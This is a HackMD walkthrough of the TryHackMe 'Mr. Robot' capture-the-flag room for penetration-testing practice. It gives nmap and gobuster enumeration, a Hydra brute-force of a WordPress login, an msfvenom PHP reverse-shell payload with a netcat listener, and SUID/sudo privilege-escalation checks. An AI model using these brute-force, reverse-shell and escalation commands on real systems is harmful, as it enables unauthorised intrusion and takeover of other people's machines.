HackMD - Collaborative Markdown Knowledge Base

# Mr. Robot Walkthrough The Mr. Robot room on TryHackMe is a popular Capture the Flag (CTF) challenge based on the TV show Mr. Robot. The challenge is designed to test a variety of skills including enumeration, web exploitation, and privilege escalation. Here’s a step-by-step guide to get you started from scratch: ### 1. Setting Up Your Environment Before diving into the challenge, ensure you have a suitable environment set up: #### Virtual Machine (VM): It’s recommended to use a Kali Linux VM for this challenge since it comes pre-installed with many tools you'll need. #### VPN Connection: You’ll need to connect to the TryHackMe network via OpenVPN. Download the configuration file from TryHackMe and connect using: ``` sudo openvpn yourfile.ovpn ``` ### 2. Starting the Machine On TryHackMe, start the Mr. Robot machine. This will provide you with an IP address that you’ll be working with. ### 3. Initial Enumeration Ping the Machine: ``` ping -c5 <target-ip> ``` This checks if the machine is up and reachable. Nmap Scan: The first step is to enumerate open ports and services. ```bash= nmap -sC -sV -oN nmap_scan.txt <target-ip> ``` -sC runs default scripts. -sV probes open ports to determine service/version info. -oN saves the output to a file. ### 4. Web Enumeration Given the theme, the most likely vector is a web-based attack: Check the Web Server: Open a browser and navigate to `http://<target-ip>`. Explore the website; the content might provide clues. Directory Bruteforcing: Use a tool like gobuster to find hidden directories or files. ``` gobuster dir -u http://<target-ip> -w /usr/share/wordlists/dirb/common.txt ``` This could reveal hidden directories like `/robots.txt`, which is often used for clues. ### 5. Analyzing Discovered Files `robots.txt`: If found, it might contain directories that lead to interesting content. For example: ``` User-agent: * Disallow: /fsocity.dic Disallow: /key-1-of-3.txt ``` #### Downloading Files: If you find a dictionary file like fsocity.dic, download it. It might be useful for brute-forcing login credentials. ### 6. Brute Forcing Login (If Applicable) WordPress Login: If you find a WordPress login page, try brute-forcing it with the dictionary file. ``` hydra -l <username> -P fsocity.dic <target-ip> http-form-post '/wp-login.php' ``` ### 7. Exploiting Vulnerabilities If you gain access via a web application: Reverse Shell: If you find a vulnerable file upload or command injection, use it to gain a reverse shell. This might involve generating a payload with msfvenom or using a ready-made PHP reverse shell. ``` msfvenom -p php/reverse_php LHOST=<your-ip> LPORT=4444 -f raw > shell.php ``` Set up a listener on your machine: ```bash nc -lvnp 4444 ``` ### 8. Privilege Escalation After gaining initial access, the goal is to escalate privileges to root: Enumerate the System: Check for SUID binaries, cron jobs, or weak sudo permissions. ``` find / -perm -u=s -type f 2>/dev/null ``` ``` sudo -l ``` Exploit Vulnerabilities: If you find a vulnerable SUID binary or a cron job running as root, exploit it to escalate privileges. ### 9. Capture the Flags The final goal is to find and capture the flags: User Flag: This is typically found in the home directory of the user you gain access to. Root Flag: Found in the /root directory after gaining root access. ### 10. Post-Exploit: Clean Up If this were a real-world scenario, you would clean up your traces. In a CTF, it's good practice to document what you’ve done and share insights with others. ### Tools Summary: #### Nmap: For port scanning and service enumeration. #### Gobuster: For directory brute-forcing. #### Hydra: For brute-forcing logins. #### Netcat (nc): For reverse shell listener. #### Msfvenom: For payload generation. #### LinPEAS: A script for post-exploitation enumeration (Linux Privilege Escalation Awesome Script). Tips: #### Take Notes: Document every step you take. This will help you understand what you've done and make it easier to retrace steps if needed. Google Everything: If you're stuck, don’t hesitate to Google specific errors, commands, or techniques. The CTF community is vast, and someone has likely encountered your issue before. Feel free to ask if you need clarification on any specific steps!